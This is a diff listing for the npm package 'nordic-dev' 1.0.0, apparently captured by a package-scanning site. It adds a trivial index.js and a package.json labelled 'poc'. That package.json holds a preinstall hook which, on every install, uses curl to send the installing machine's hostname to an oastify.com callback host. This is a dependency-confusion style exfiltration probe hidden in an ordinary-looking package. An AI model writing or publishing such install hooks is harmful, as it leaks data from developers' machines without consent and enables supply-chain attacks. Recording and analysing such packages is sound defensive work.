nordic-dev 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // index.js
2
+ console.log("odin package");
3
+
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "nordic-dev",
3
+ "version": "1.0.0",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl --data-urlencode info=$(hostname) http://479pa367cl3elrpuciye4inib9h65wtl.oastify.com"
9
+ },
10
+ "author": "Akita",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "account": "^1.0.0"
14
+ }
15
+ }